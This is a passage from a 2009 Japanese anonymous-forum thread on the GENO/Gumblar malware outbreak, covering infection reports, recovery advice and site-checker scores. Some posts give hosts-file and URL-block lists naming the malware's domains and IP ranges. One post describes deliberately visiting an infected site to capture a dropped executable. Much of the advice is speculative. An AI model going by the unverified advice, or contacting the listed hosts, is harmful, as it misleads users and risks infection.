仮に感染したさいの有効な駆除方法がクリーンインスコだけってのがなぁ

501 :192.168.0.774:2009/05/19(火) 00:31:07 ID:hITb4yl00
これ日本人が作ったぽいの?

502 :192.168.0.774:2009/05/19(火) 00:32:44 ID:nWoCjk+Z0
>>496
無茶しやがってw
てか、スレ違いだw


503 :192.168.0.774:2009/05/19(火) 00:35:14 ID:IKGSVY/WO
F-SecureでIP遮断する方法わかる人いるかね

504 :192.168.0.774:2009/05/19(火) 00:35:28 ID:UGmWlFzp0
無茶しつつやりがやって

505 :192.168.0.774:2009/05/19(火) 00:35:34 ID:NWiPjNpy0
>>502
ご心配かけました。

506 :192.168.0.774:2009/05/19(火) 00:37:04 ID:7uX+S+lt0
>>503
とっとと失せろハゲ

507 :192.168.0.774:2009/05/19(火) 00:40:10 ID:c0nVQzhwO
質問何ですが、感染PCから必要なファイルの吸い上げってやっても問題ない?
普通のウィルスと一緒でアウト?

508 :192.168.0.774:2009/05/19(火) 00:40:45 ID:7uX+S+lt0
>>507
日本語でおk

509 :192.168.0.774:2009/05/19(火) 00:43:01 ID:WSVhxRbK0
今日はもうリカバリする時間無いからケーブル引っこ抜いてネットにつないでない状態にしても
意味ないですかね。今更。

510 :192.168.0.774:2009/05/19(火) 00:43:24 ID:c0nVQzhwO
>>508
既にほぼ感染が確定している端末から、外付けHDDに必要なファイル(ワードなど)を移動しても問題ないかな?

511 :192.168.0.774:2009/05/19(火) 00:44:06 ID:bCAGVojU0
>>503
F-Secureへ検体提供している人ならここにいるけど…何か用ですか?
F-SecureのFW設定でステップに従って設定すればいいだけなのに?

512 :192.168.0.774:2009/05/19(火) 00:45:22 ID:rSvaKTkO0
native-instruments
ttp://www.native-instruments●jp/index.php?id=audiokontrol1
危険度121%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告

一応張っておく

513 :192.168.0.774:2009/05/19(火) 00:46:11 ID:UGmWlFzp0
大丈夫だよ。


514 :192.168.0.774:2009/05/19(火) 00:50:52 ID:c0nVQzhwO
大丈夫か
一応、次に開く時はVistaのノートンでチェックかけてからにするか

515 :192.168.0.774:2009/05/19(火) 00:51:56 ID:IKGSVY/WO
>>511
ファイヤーウォールのとこ?
よくわかんないけどいじってみる
ありがとう

516 :192.168.0.774:2009/05/19(火) 00:52:31 ID:2apSfkB60
>>481
大手企業のも掛ってるから圧力掛ってるとか言われてるけど、実際のところどうなんだろうね。
新型インフルに負けず劣らずの脅威だと自分は思うんだけど。

というか痛いニュースとかでも全然載ってないね。
情報が錯綜しているから管理人が様子見してるとか?それとも、流行りだしたころに「痛いニュースが感染」ってデマが流れたからかな。

517 :192.168.0.774:2009/05/19(火) 00:56:40 ID:2apSfkB60
gnomeの人も大変だろうな。
注意しても逆切れされてとか色々。俺なら投げてるわ

518 :192.168.0.774:2009/05/19(火) 00:56:49 ID:NWiPjNpy0
>>512
なぜか遮断となってしまったorz
.jpは通すはずだけどネタサイトですか?

519 :192.168.0.774:2009/05/19(火) 00:59:22 ID:IyKOpCbn0
Adobe Readerアンインストールすれば無敵

520 :192.168.0.774:2009/05/19(火) 01:00:17 ID:ueYp26dw0
>>516
抜かれるのがFTPのIDとパス?何それ?サイト?ああホームページね持ってないから関係ない

という考えの人が多いような気がする
これがある一定の数まで感染した頃に一斉にクレカの情報などを感染PCから抜き始めたら
たぶん皆大騒ぎすると思う

521 :192.168.0.774:2009/05/19(火) 01:00:50 ID:vElGKTyLP
>516
2ちゃんでも、あまり話題になってないんだよな


522 :192.168.0.774:2009/05/19(火) 01:02:00 ID:BfeDPikc0
>>517
さらにNifty感染デマの発信源にされちゃってるしな

523 :192.168.0.774:2009/05/19(火) 01:03:05 ID:IlBvShIz0
マスコミもIT弱者。権威ある所が何か言わないと動けない。
ウイルスベンダが対策追いつかない為、どこのウイルスベンダも沈黙を守ったまま

無名の技術者がいくら警笛鳴らしても、マスコミは動かんよ


524 :192.168.0.774:2009/05/19(火) 01:04:45 ID:NWiPjNpy0
>>512
www.native-instruments.comへ飛ばす仕組みですか

525 :192.168.0.774:2009/05/19(火) 01:05:32 ID:2apSfkB60
>>512
googleから検索して行って見たけどスルー。
当方VISTA(UACon)+avast!(+spybot+AntiVir)
UACの反応も無論なし。
>>518
サウンドミキサーの紹介ページ。自分も友人から譲り受けたの使ってる。大体三万位らしいけどかなり良いよ・・・・・・ってスレチか。

526 :192.168.0.774:2009/05/19(火) 01:06:42 ID:vElGKTyLP
このウイルスに感染した場合
FTPでWebサーバーにファイルをアップロードする際に
アカウントを盗みとられ、それによりWebサイトが
改竄されるという話もある。特にWebサイトを運営している方は
注意が必要だろう。
http://slashdot.jp/security/article.pl?sid=09/05/18/1021242

俺はサイト運営してないから関係ねーって人が多そう
この記事も〜されるって書いてるし
なんか曖昧

527 :192.168.0.774:2009/05/19(火) 01:10:58 ID:WSVhxRbK0
>>516
クレジットカードの番号だとかID,PASSとか普通に抜かれる脅威があるのに
かなり深刻だよな。
明日本気でリカバリするわ。流石にクレジットの番号抜かれたらしゃれにならん。
ていうかもう遅いのかな?感染してからリカバリしても。いずれにしてもするけど。

528 :192.168.0.774:2009/05/19(火) 01:11:01 ID:bCAGVojU0
F-Secure Update報告を検体スレに記載しました。

内容:
検体スレの id10で提供のあった検体について、18日付の定義
F-Secure Hydra Update 2009-05-18_01
F-Secure Hydra Update 2009-05-18_02
のどちらかで対応されました。
(チェックするの忘れてて、30分前に気づいたら02がDLされてたので
 正確にどちらで対応されたかまでは不明…)
また、sound●jp/yudai_marimba/にて埋め込まれていた
スクリプトについて、F-Secure Security Labs より
次回DB更新にて対応との回答がありました。
おそらく、先ほどの Hydra Update にて対応されているものと推測されますが、
該当のWebサイトが403応答のため確認できず。

以上、長駄文失礼しました。

529 :192.168.0.774:2009/05/19(火) 01:11:58 ID:UGmWlFzp0
こういう注意喚起してほしいよな
・もしウイルスに感染した場合、インターネットのサイトで
 入力したパスワード等すべて盗聴される、と。

それくらいの勢いでやらないと。

530 :192.168.0.774:2009/05/19(火) 01:12:10 ID:NWiPjNpy0
>>525
サウンドミキサーの紹介ページですか参考になりました。
.comはとりあえず遮断としていたから見れなかったけどまともなページのようで。
Location で即座にjpからcomへ飛ばす装置がついてたようで・・・

531 :初心者@レン様萌死:2009/05/19(火) 01:16:42 ID:gcscOsPA0
何度も書き込みましたが、よろしかったら教えてください
知りたいのはGENOウイルスの【拡張子】です

532 :192.168.0.774:2009/05/19(火) 01:18:19 ID:HIaWsRPJ0
swnjn

533 :192.168.0.774:2009/05/19(火) 01:19:31 ID:UGmWlFzp0
(ノ∀`)アチャー

534 :192.168.0.774:2009/05/19(火) 01:20:37 ID:5LCBC34N0
マルチフィッシングご苦労様です

535 :192.168.0.774:2009/05/19(火) 01:21:06 ID:tVLA0dSpO
ワロタwww

536 :192.168.0.774:2009/05/19(火) 01:23:42 ID:SyaLIZg70
ジャーン

537 :192.168.0.774:2009/05/19(火) 01:28:34 ID:lUGZrCzK0
>>531
.genoに決まってるじゃないか

538 :192.168.0.774:2009/05/19(火) 01:28:55 ID:8FgxAqIl0
実行ファイル見つかってるならここまで焦らないだろ・・・

539 :192.168.0.774:2009/05/19(火) 01:31:13 ID:YTVl+5kY0
分かってたらここまで大騒ぎして検体だの何だの言ってません

540 :192.168.0.774:2009/05/19(火) 01:31:29 ID:HIaWsRPJ0
>>538
e.batが自動削除される前に捕まえるんだ

541 :192.168.0.774:2009/05/19(火) 01:33:07 ID:NWiPjNpy0
かなり危険な>>512が防げたから
GENO防止対策だけは万全と考えていいですか?

542 :192.168.0.774:2009/05/19(火) 01:36:45 ID:pVslweRIO
専門的な話しをしている所すみません。感染した場合リカバリするしかないようですがファイルが壊れたと起動すらしない場合リカバリって出来るのでしょうか?まとめサイトではリカバリをとしかなかったので困り果ててます。スレチでしたらスルーして下さい

543 :192.168.0.774:2009/05/19(火) 01:36:52 ID:j31Rq9MM0
>>512
DTM板住人やばくね?

544 :192.168.0.774:2009/05/19(火) 01:37:59 ID:HIaWsRPJ0
>>541
ひとつひとつ防御を外していく作業に取り掛かるんだ
まずはIPブロック、次はjavaScript、次はreader
いや冗談だよ

545 :192.168.0.774:2009/05/19(火) 01:43:31 ID:NWiPjNpy0
>>544
合格をいただきありがとう
JavaScriptほかIEはデフォルトのままなので
許可した国内サーバーがハックサイトならイチコロです

546 :192.168.0.774:2009/05/19(火) 01:44:14 ID:zf5ipXqL0
>>542
どういう方法でリカバリするかによる
普通はOSのCDを使う。
HDDではなく、CDドライブで起動させるから関係ない
HDDにリカバリセットがある場合はどうなんだろうね

547 : ◆T0e.kDbaK2 :2009/05/19(火) 01:45:01 ID:tYE0we350
ノートン先生GENO対策はまだですか?

548 :192.168.0.774:2009/05/19(火) 01:49:25 ID:ErLodprQ0
>>545
乙です。

549 :192.168.0.774:2009/05/19(火) 01:52:43 ID:UC6GMVH10
>>547
ユーザーなら検体提出すればいいじゃん

550 :192.168.0.774:2009/05/19(火) 01:54:00 ID:Kkiw6cIJ0
stargazer●flop●jp/pl/mythos/

GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

声同人サイト。
感染報告あり、現在は対策済みとのこと。
オンラインでの制作協力の募集の際、応募者から感染した疑い。
募集サイトなどにも登録していたため、被害が拡大してる可能性あり。

551 :192.168.0.774:2009/05/19(火) 01:55:16 ID:zf5ipXqL0
対応済みサイトはいらないんじゃないの?
検体手に入らないし
つか対応済みもありならいくらでも出せるんだが

552 :192.168.0.774:2009/05/19(火) 01:55:23 ID:gmYUalTM0
>>550
そんな経緯で感染したのなら
また感染サイトに戻る可能性もありそうですね

553 :192.168.0.774:2009/05/19(火) 01:56:39 ID:tVLA0dSpO
対応済みのも晒すとなると混乱するぞ

554 :192.168.0.774:2009/05/19(火) 01:59:26 ID:NWiPjNpy0
>>550
KINOSHITA氏乙

555 :192.168.0.774:2009/05/19(火) 02:00:37 ID:xNz70xs60
SANSキター

JSRedir-R/Gumblar badness
ttp://isc.sans.org/diary.html?storyid=6403

556 :192.168.0.774:2009/05/19(火) 02:02:44 ID:P/ZWBq6u0
確認

557 :192.168.0.774:2009/05/19(火) 02:04:23 ID:zf5ipXqL0
対応済みと誤検出とか誤報分はさっさと消していった方が良いと思う
と言うか対応済みになったら消すって話だったはずだし。

リンク集の人は今はいないのかな

558 :192.168.0.774:2009/05/19(火) 02:04:24 ID:NWiPjNpy0
>>555
危険サイトですが、遮断できました。


559 :192.168.0.774:2009/05/19(火) 02:09:45 ID:Kkiw6cIJ0
>>551
そう思ったんだけど、感染の経緯が気になったので一応。

560 :192.168.0.774:2009/05/19(火) 02:15:28 ID:HONrThB00
さてGENO感染したわけなんだが
さっさとリカバリしたほうがいいおね?

561 :192.168.0.774:2009/05/19(火) 02:16:15 ID:oJ5eOA/M0
もちろんです

562 :192.168.0.774:2009/05/19(火) 02:16:24 ID:B7z3cijT0
どこで感染したか心当たり書いていきなさいな

563 :192.168.0.774:2009/05/19(火) 02:16:38 ID:8FgxAqIl0
どうせだから検体提供してからリカバリすればいい

564 :192.168.0.774:2009/05/19(火) 02:17:28 ID:fpg3i94d0
◆感染してるっぽい場合
残念ながら、現状では回復不能です。
OSクリーンインストール一択


565 :192.168.0.774:2009/05/19(火) 02:17:58 ID:tVLA0dSpO
198 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 14:53:04 ID:Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの?
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/

566 :192.168.0.774:2009/05/19(火) 02:18:39 ID:NH/hp2qd0
>>565
過去ログ嫁

567 :192.168.0.774:2009/05/19(火) 02:19:25 ID:Kkiw6cIJ0
>>565
ってかコピペした名前欄見てわかれw

568 :192.168.0.774:2009/05/19(火) 02:21:53 ID:HONrThB00
>>562
心当たりがまったくないんだこれが


ところでデータのバックアップは取っておいても問題ないよな?

569 :192.168.0.774:2009/05/19(火) 02:23:47 ID:WSyhd7W40
Windows Live OneCare PC セーフティ ダメ元でどないさ?
検出できるかもだぞ(自己責任で)


570 :192.168.0.774:2009/05/19(火) 02:23:52 ID:AUqqrP4RO
ディスクトップにエロサイト登録云々の窓が出て消えません。

どうやって消すんですか?(^・ェ・)

571 :192.168.0.774:2009/05/19(火) 02:24:28 ID:zf5ipXqL0
画像やMIMEで感染することもあるってけっこう前のレスで見たことあるんだけど
これに当たったらFlashとか最新でも意味ないってことだよね?
画像はJS切っててもダメだし
あんまり無いみたいだけど、これらに当たる確立ってどのくらいですかね?

572 :192.168.0.774:2009/05/19(火) 02:26:03 ID:jteIpj210
>>558
勇者乙。

573 :192.168.0.774:2009/05/19(火) 02:27:20 ID:p3xKLpeP0
ブラウザによっては設定で画像の表示もカット出来るのあるから
それも推奨した方がいいかもね
これに限らず色々な予防になるだろうし

574 :192.168.0.774:2009/05/19(火) 02:28:02 ID:q14fHd0hO
DEP全がけはちょっとは気休めになる?
手っ取り早い方法かなとは思うんだが

575 :192.168.0.774:2009/05/19(火) 02:33:46 ID:NX9jXQdq0
>>571
jpg感染が話題になったころって結構前だと思うけど
その辺の脆弱性ってもう塞がれて無かったっけ?

未知のウイルスに怯えるのが嫌なら、もはや根性論みたいな世界だが
下記である程度は防げる。
1段階目
・JS/ActiveX OFF
・ちょっとでも怪しいと思われるサイトにいかない/リンクはクリックしない
・FWやアンチウイルスなどで外へ/外からのアクセスはかなり限定して絞る
・ダブルクリックでファイルオープンしない

2段階目
・携帯/ゲーム機/スマートフォンなどのモバイル機のブラウザでネットは済ませる

3段階目
・そもそもネットしない

576 :192.168.0.774:2009/05/19(火) 02:35:00 ID:Mv06Xwnu0
cmd.exe動いても感染してる人もいるみたいだし、
今現状、sqlsodbc.chmの書き換えくらいでしか
genoウイルスの判断が出来ないってのが怖いね。

577 :192.168.0.774:2009/05/19(火) 02:40:15 ID:GE0XuQAi0
JavaScript切って画像もOFFにしなきゃだめかな?
もうブラウザ使わなってことか?

578 :192.168.0.774:2009/05/19(火) 02:41:31 ID:zf5ipXqL0
>>575
ありがとうございます
JSはオフにして必要な時は先にソース覗いてるんだけど
画像は防げないから怖くてね。でもけっこう前の話だったのか。すまん

579 :192.168.0.774:2009/05/19(火) 02:41:59 ID:Gb6zlhDk0
さっきIE(厳密にはルナ)でこのスレ見たら
Avastたんが2回くらい「こらぁーっ!」て

これも>>88みたいな誤検知でいいんだよな?
テンポラリ辺り見てたみたいだし
しかし反応ある事自体が恐ろしすぎる…

580 :192.168.0.774:2009/05/19(火) 02:45:30 ID:NX9jXQdq0
>>578
画像ファイル関係の脆弱性が最近また発見されたならわからないけど。
こまめにWindowsUpdateしておくしかないんじゃないかな。
画像が怖いなら画像ブロックすればいいけど、
そこまで不便にしてもいいならもう携帯なりでブラウズしたほうが
安心なんじゃない?

581 :192.168.0.774:2009/05/19(火) 02:52:03 ID:hUygLclYO
すみません、
過去スレが見られないのでお聞きしますが
mixiやPixivといった動的サイトの感染報告はあるのでしょうか。

582 :192.168.0.774:2009/05/19(火) 02:52:14 ID:eCUy3/Fb0
ノートン先生の更新きたが対応したのだろうか

583 :192.168.0.774:2009/05/19(火) 02:53:47 ID:oJ5eOA/M0
精神衛生上一番いいのは、もう1台安いPCで
良いからネット専用機を用意することだね
で、極力PC内に情報を入れない。
ログインユーザー名もニックネーム程度にとどめる

584 :192.168.0.774:2009/05/19(火) 02:53:52 ID:NH/hp2qd0
>>581
セキュ板は途中から見なくなったが
他板のログを見る限りmixiとpixivの報告例はないな

585 :192.168.0.774:2009/05/19(火) 02:56:35 ID:zf5ipXqL0
>>584
リンク集の方にはピクシブの報告が上ってる
感染の疑いがあるサイト(未確認)で
ピクシブの一部ページで感染確認ってコメントがある
どうなんだろうな?

586 :192.168.0.774:2009/05/19(火) 02:59:13 ID:hUygLclYO
>>584
ありがとうございます。
利用者人口や更新頻度の膨大さを考えると
動的サイトの感染は今の段階では無いと考えても良さそうですね。

587 :192.168.0.774:2009/05/19(火) 03:01:00 ID:jeFZakeZ0
>>585
それいたずらか誤検出だと思うんだけどねぇ
それこそ誰ぞがAvast激怒の文字列をコメに書いたら反応するんでw

588 :192.168.0.774:2009/05/19(火) 03:01:13 ID:xod3EvsV0
こういう認識で良いのだろうか?

1.改竄されたサイトにアクセス
2.悪意あるコードが実行され、AdobeReaderなどの脆弱性を利用しウィルスがダウンロードされる
3.>>1にある症状が発症

結果、該当ソフトを最新版にしセキュリティホールを潰しておけば改竄されたサイトを踏んでも
ウィルス感染はしない?

589 :192.168.0.774:2009/05/19(火) 03:01:31 ID:lUGZrCzK0
SNS系がやられたらもっと大騒ぎになってると思うな
もしかしたらそう遠くない未来の話かもしれんが

590 :192.168.0.774:2009/05/19(火) 03:03:40 ID:tbk2lh/+O
ファイル書き換えが行われないケースもあるって話はどうなりました?

591 :192.168.0.774:2009/05/19(火) 03:05:51 ID:7uX+S+lt0
>>588
セキュリティホールって何か知ってる?

592 :192.168.0.774:2009/05/19(火) 03:07:49 ID:zf5ipXqL0
>>587
だよな。俺も誤検出かなんか別のとの勘違いとしか思えないんだよな
ピクシブなんて同人板から注意喚起に協力しろって凸されてたくらいだし

593 :192.168.0.774:2009/05/19(火) 03:08:12 ID:19M58xD70
>>579
ttp://www29.atwiki.jp/geno/pages/23.html

594 :192.168.0.774:2009/05/19(火) 03:16:02 ID:hUygLclYO
>>585
586ですがすみません、リロってなかったorz

今の段階では危険性は低そうなものの、今後の為にも注意するに越した事はなさそうですね。
ありがとうございました


ついでにもう一つお聞きしたいのですが、
感染報告のあった企業のサイトに大学のパソコンでアクセスしてしまった事があるのですが
(GENOの存在を知ってから感染確認してみましたが大丈夫でした)
万が一イントラネットで繋がっているパソコンが感染した場合、繋がっているパソコンにも感染する危険性はあるのでしょうか?

595 :192.168.0.774:2009/05/19(火) 03:16:47 ID:Kkiw6cIJ0
>>583
そのPC常にONにしとかないと。
感染後に電源切ったらアウアウ。

596 :192.168.0.774:2009/05/19(火) 03:25:14 ID:8FgxAqIl0
学校のPCの場合、システムによって変わるだろう
たとえばデータの保存をネットワークドライブでしてて、ローカルをログイン毎に初期化するなら大丈夫かもしれん

597 :192.168.0.774:2009/05/19(火) 03:25:45 ID:jeFZakeZ0
>>594
現時点でその手の報告は無いが亜種がまだ作られてるようだし、
ウィルス対策ベンダーとかで挙動解析終了報告等上がって無いから0とは言えん

>>595
マテマテ、ウェブブラウズ専用PCだというに。再起動してBSODになったら即座にHDDフォーマット→再インストールで良い

598 :192.168.0.774:2009/05/19(火) 03:27:18 ID:19M58xD70
>>594
俺の知るかぎり現時点ではそういう報告は無いし、現状ではそういう動作をしない
(1件あるがどう解釈しても酷く信憑性に欠ける内容の為除外)

599 :192.168.0.774:2009/05/19(火) 03:36:32 ID:bnQ0XBCe0
ニコニコの毎時ランキングが103%だったが、どーなんだろ。
他は大丈夫のようだが。

600 :192.168.0.774:2009/05/19(火) 03:40:11 ID:xod3EvsV0
>>591
その質問の意図がわからない。

601 :192.168.0.774:2009/05/19(火) 03:44:27 ID:e2ktk7qxO
>>599
JSが複雑なほど%が高くなる傾向にある
ランキングなんかスクリプトめちゃくちゃ複雑なんだろうな。
そういうわけでソース見ないことには…

602 :192.168.0.774:2009/05/19(火) 03:47:21 ID:8FgxAqIl0
ソースざっとみたところ妙なコードは混じってなかったな

603 :192.168.0.774:2009/05/19(火) 03:52:42 ID:bnQ0XBCe0
>>601-602
そうかぁ。お手数おかけして申し訳ない。
一応、使用者も多いところだし、報告しておかないと、と思って。

604 :192.168.0.774:2009/05/19(火) 04:25:36 ID:/0R1YWPe0
低スペッコPCなんでFlashPlayer10.0.22.87と最終更新日が一緒の
9.0.159.0をつかってるんだが10系に更新したほうがいいのかえ?

605 :192.168.0.774:2009/05/19(火) 04:30:34 ID:ZipoF5ab0
なんか、各ウイルスソフトの更新の間隔が短くなったような気がするのだが
情報集めてるのかな?


606 :192.168.0.774:2009/05/19(火) 04:32:10 ID:dypK0PU60
スレやまとめにある感染確認してみたところ異常なし判定のライン
その後readerやflashの最新版をインスコして再起動したらBSOD発動
再度まとめを回って確認したものの現段階での感染は確認できず
>>5を見ると再起動でBSODになるのはケーブル抜いたときみたいなので
繋がったまま再起動でBSODは別件と見ていいんだろうか…
詳しく分かる人がいたらセフかアウか教えてほしい
一応ウイルスチェックはした、ソフトはESET Smart 結果は感染無し
現段階で確認できた異常はBSCD以外にはなし

607 :192.168.0.774:2009/05/19(火) 04:33:51 ID:lp0rwG400
こいつってウイルス自体を更新してるみたいだけど
20万台を一斉に発動させるなんて出来るのかな?
それが狙いならかなりヤバイ組織がサイバーテロるーとか
何かくれないとF5攻撃しちゃうぞーみたいに動いたりすんのか・・・

608 :192.168.0.774:2009/05/19(火) 04:40:04 ID:zf5ipXqL0
アンチソフトやWinUpDataだって自動更新するぞ?

609 :192.168.0.774:2009/05/19(火) 04:44:49 ID:lp0rwG400
いやなんかこう
アジャムヒンなんたらみたいのが国防総省にわーっと
やっちゃうとか妄想すると結構楽しいじゃん・・・

mixiやられたら終わるな

ukokkeiと出版社どうなった?

610 :192.168.0.774:2009/05/19(火) 04:46:11 ID:jeFZakeZ0
>>607
ウィキペディアでボットネットを検索しろw

611 :192.168.0.774:2009/05/19(火) 04:46:36 ID:zf5ipXqL0
あじゃむひん??

どうなった?って見に行って確かめておいでよ

612 :192.168.0.774:2009/05/19(火) 04:47:07 ID:k1m5qQpl0
>>609
妄想するのも楽しそうだがbotnetでググってくるといい

613 :192.168.0.774:2009/05/19(火) 04:57:42 ID:cfPcfw5J0
>>600
セキュリティホールってのが「セキュリティ対策を万全にしたはずなのに抜けてるところ」
を指しているのならば、あなたが潰したのは「セキュリティホールだったもの」に過ぎない。

本当のセキュリティーホールってのは、今回あなたが潰しそこなったところにある(かもしれない)。
だとするならば安心するのは早い、という事。


以上エスパーでした。

まあ、セキュリティーホールってのは逃げ水みたいなものなんだよ、とエスパー追加。

614 :192.168.0.774:2009/05/19(火) 05:01:22 ID:gyXM1w6y0
>>491
hosts書き換えようとすると

「ファイルC:\Windows\System32\drivers\etc\デスクトップ\hostsを作成できません
パスおよびファイル名が正しいか確認してください」

と出るんだけど構わず名前をつけて保存しちゃって良いの?

615 :192.168.0.774:2009/05/19(火) 05:03:36 ID:/IrNsmO50
>>614
hostsファイルに読み取り専用属性がついてるんじゃないか?
右クリック→プロパティで読み取り専用のチェック外してから、開いて編集して保存でどうよ?
あと、念のために元の状態のhostsファイルをどっかにバックアップしておこうな

616 :192.168.0.774:2009/05/19(火) 05:05:11 ID:m0FB93L50
>>606
BSCDとはなんぞや?
検出するかどうかはESETが対応してるかどうかでしょうよ
>>1のまとめ見て判断しようぜ

617 :192.168.0.774:2009/05/19(火) 05:05:19 ID:k1m5qQpl0
俺のはetc\hostsなんだが
etc\デスクトップ\hostsなんてことがあるのか

618 :192.168.0.774:2009/05/19(火) 05:12:44 ID:ZipoF5ab0
転載の天才

553 名前: ムレスズメ(catv?) 投稿日: 2009/05/19(火) 05:04:12.14 ID:uzMMFCCh
>>547

転載
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

>ScanSafe
>Google SERPs Redirections Turn to Bots
>のレポート、および
>gumblar.exe -- ThreatExpert
>の実ファイル解析により、
>GumblarはIRCもしくは何か別のものによる Botnet 命令待機を行っている可能性が高くなりました。
>(中略)
>感染者は内部汚染ファイルを自動更新させられる危険性があります。

相手が本気出したら即死の可能性あるよ

619 :192.168.0.774:2009/05/19(火) 05:18:24 ID:gyXM1w6y0
>>615
ありがとうございます。読み取り専用になってました
これって書き換えた後は読み取り専用に戻しておいたほうがいいですか?

>>617
>>491に従ってデスクトップにコピペしたんで

ちなみに、こんなとこ使ってないからスカスカのテキストが開くと思ってたら
Spybotが使ってたらしくビッチリ登録されててびびったw

620 :192.168.0.774:2009/05/19(火) 06:06:39 ID:IHaBOlSj0
>>6>>7
の通りやって
正常値だったら問題なしですか?

621 :192.168.0.774:2009/05/19(火) 06:28:09 ID:/EQPJ3Eb0
>>620
自分で判断する癖を付けましょう
あなたが求めている情報はすでに出揃っているはずです

622 :192.168.0.774:2009/05/19(火) 06:40:11 ID:jVRWP8My0
○○すれば安心ですか?問題ないですか?みたいな質問に対する回答は
「自分で判断しろ」と「はいはい安心デスヨー」のどちらがいいのだろう

こういう質問する人って本当のことが知りたいのではなく、たとえ間違っていても
「自分が望む答え」が欲しいだけだからテキトーに答えて追い返した方が得策なのか

623 :192.168.0.774:2009/05/19(火) 06:47:59 ID:xlP+ulkj0
どんなに守りを固めても安心は永遠に来ないと真実を告げる

624 :192.168.0.774:2009/05/19(火) 06:49:44 ID:ebHg3CWR0
>>622
「セキュリティに完璧」は有り得ません。

625 :192.168.0.774:2009/05/19(火) 06:50:29 ID:m4p3L/VDO
腐女子さん達もう嫌だ・・

まだ全然わかってない奴が居るんだけどさぁ、そいつらは感染したら自業自得って事にてもいいよね?

626 :625:2009/05/19(火) 06:52:38 ID:m4p3L/VDO
事にて→×
事にして→〇


吊ってくる

627 :192.168.0.774:2009/05/19(火) 06:56:33 ID:zf5ipXqL0
532 : クンシラン(アラバマ州) [sage] :2009/05/19(火) 03:04:45.34 ID:L1oEc3bK
hostsファイルに(ry
127.0.0.1 martuz.cn
127.0.0.1 zlkon.lv
127.0.0.1 findyourbigwhy.cn
127.0.0.1 bigtopsuper.cn
127.0.0.1 gumblar.cn
127.0.0.1 jii.be
127.0.0.1 zief.pl
127.0.0.1 litefront.cn


533 : クンシラン(アラバマ州) [sage] :2009/05/19(火) 03:09:11.38 ID:L1oEc3bK
avastのwebシールド(URLブロック)に
*martuz.cn*
*zlkon.lv*
*findyourbigwhy.cn*
*bigtopsuper.cn*
*gumblar.cn*
*jii.be*
*zief.pl*
*litefront.cn*
過剰反応っぽいが、細かい事は気にするな

V速で拾ってきたんだが、ドメイン増えた?
あと有効ならこっちでもテンプレ化してほしい

628 :192.168.0.774:2009/05/19(火) 06:59:56 ID:/EQPJ3Eb0
>>625
なんだかわからんが乙

629 :192.168.0.774:2009/05/19(火) 07:06:58 ID:SRl4TXVx0
上の方でも言われてるけど海外のサイト
危険度高いな

CNN 72%

ABCNEWS 107%

FOX NEWS 203%

630 :192.168.0.774:2009/05/19(火) 07:20:53 ID:m4p3L/VDO
今あるウイルスチェッカーって
「黒判定だけど白だった」っていう誤判定はあるけど
「白判定だけど黒だった」っていう誤判定はある?


631 :192.168.0.774:2009/05/19(火) 07:23:16 ID:9dfS5bVD0
なんぼでもある

632 :192.168.0.774:2009/05/19(火) 07:24:21 ID:o4562oQV0
>>629
感染していないのにそんな判定出したら
まずいだろ、朝日新聞も90パーだったぞ。
NIfの二の舞をを避けるためにも
もっと精度を上げないと。

633 :192.168.0.774:2009/05/19(火) 07:25:03 ID:IlBvShIz0
>>627
また増えたのか?
鯖に増えられるとIP焼きでも間に合わんな


634 :192.168.0.774:2009/05/19(火) 07:27:35 ID:os4TYElc0
さっき試しに感染サイトへアクセスしたら785.exeってのをtempにダウンロードしたよ
これがたぶん元凶か

C:\DOCUME~1\ユーザー\LOCALS~1\Temp\785.exe

635 :192.168.0.774:2009/05/19(火) 07:32:39 ID:9dfS5bVD0
>>633
全部>>463にあるIPアドレス範囲だわ

636 :192.168.0.774:2009/05/19(火) 07:35:10 ID:zf5ipXqL0
>>635
dd
ドメインだけ増えた? どちらにしろhostsは追加だな
avastのwebシールドってのも
このスレじゃあんまり触れられてなかった気がするが色々出てくるね

637 :192.168.0.774:2009/05/19(火) 07:38:50 ID:9dfS5bVD0
いちお貼っておく
これ以外は既出だと思うので省略

Non-authoritative answer:
Name: jii.be
Address: 78.159.114.177

Non-authoritative answer:
Name: zief.pl
Address: 221.5.74.38

Non-authoritative answer:
Name: litefront.cn
Addresses: 91.212.41.110, 91.212.41.111, 91.212.41.96

638 :192.168.0.774:2009/05/19(火) 07:44:30 ID:Vr9KJUtOO
自鯖じゃない奴等には関係ないし今更な話だけどさ
FTP鯖止めてしまえば取り敢えず外部から改竄は出来ないな
自鯖だけどメインPC共有ですーとか鯖がWindowsですーとか言う場合は知らん

639 :192.168.0.774:2009/05/19(火) 07:47:04 ID:nROd7T4M0
>>637
IPレンジでは
78.159.112.0/22
221.5.0.0/17
91.212.41.0/24
になるっぽい

640 :192.168.0.774:2009/05/19(火) 07:48:42 ID:xNz70xs60
Windowsでも普通にIISでFTP停止できるべ。

641 :192.168.0.774:2009/05/19(火) 08:06:02 ID:dvS6mKF80
なんか同人スレ観てたらJSオフにしても感染する亜種出たとか書き込んでるんだけど
そんなヤバいの確認できたの?あの子達はどんな書き込みでも信じるの?

642 :192.168.0.774:2009/05/19(火) 08:08:41 ID:VTkqYj1BO
もうびびって携帯でしかネットしてないんだけど
USBがGENOウイルスを媒介することはある?
学校のPCが信用できない……
まとめとかにかいてあったらごめん


643 :192.168.0.774:2009/05/19(火) 08:09:58 ID:Traiwv9x0
>>641
低年齢化してるらしいから

644 :192.168.0.774:2009/05/19(火) 08:14:20 ID:yKfFYkBT0
おい+100するのやめろ。janeで見れないだろが

645 :192.168.0.774:2009/05/19(火) 08:14:59 ID:pXfWYsBz0
なんかこのスレだか前スレだかで
javaスクリプト無効に失敗したSP2の同人の人の書き込みなかったっけ?
それが尾ひれついてんじゃない。
もう同人の人のことは放っておいて良いんじゃないかな。
なんでそんなに構うのかわからない。

646 :192.168.0.774:2009/05/19(火) 08:19:44 ID:zf5ipXqL0
>>641
同人板の人たちは
アンチソフトがあんまり対応してないし亜種が常に出ているから
完全に防ぐことは現状では無理です!

って言って、アップデートよりあんまり閲覧しない事とかを優先させてたくらいだからなあ
